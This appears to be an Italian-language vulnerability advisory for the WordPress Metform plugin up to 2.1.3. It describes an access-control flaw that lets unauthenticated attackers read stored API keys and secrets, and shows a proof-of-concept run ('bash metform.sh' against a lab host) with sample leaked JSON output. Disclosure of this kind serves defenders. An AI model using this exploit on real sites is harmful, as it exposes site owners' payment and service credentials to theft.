
Plugin WordPress Metform <= 2.1.3 - Controllo di accesso improprio che consente la divulgazione non autenticata di informazioni sensibili
Plugin Metform per WordPress <= 2.1.3 - Controllo degli accessi improprio che consente la divulgazione non autenticata di informazioni sensibili
Il plugin è vulnerabile alla divulgazione di informazioni sensibili a causa di un controllo degli accessi improprio nel file ~/core/forms/action.php, che può essere sfruttato da un attaccante non autenticato per visualizzare tutte le chiavi API e i segreti delle API di terze parti integrate come PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA, ecc.
bash metform.sh http://wordpress.lan
{
"form_title": "New Form # 1691056894",
"success_message": "Thank you! Form submitted successfully.",
"capture_user_browser_data": "1",
"store_entries": "1",
"entry_title": "Entry # [mf_id]",
"count_views": "1",
"redirect_to": "",
"user_email_subject": "",
"user_email_from": "",
"user_email_reply_to": "",
"user_email_body": "",
"admin_email_subject": "",
"admin_email_to": "",
"admin_email_from": "",
"admin_email_reply_to": "",
"admin_email_body": "",
"mf_mailchimp_list_id": "",
"mf_slack_webhook": "",
"mf_recaptcha_version": "recaptcha-v2",
"mf_recaptcha_site_key": "sfsdffd",
"mf_recaptcha_secret_key": "sfddsf",
"mf_recaptcha_site_key_v3": "",
"mf_recaptcha_secret_key_v3": "",
"mf_mailchimp_api_key": "asdadasdsaddas",
"input_names": "Example: [mf-inputname]",
"ckit_opt": [],
"aweber_opt": [],
"mp_opt": []
}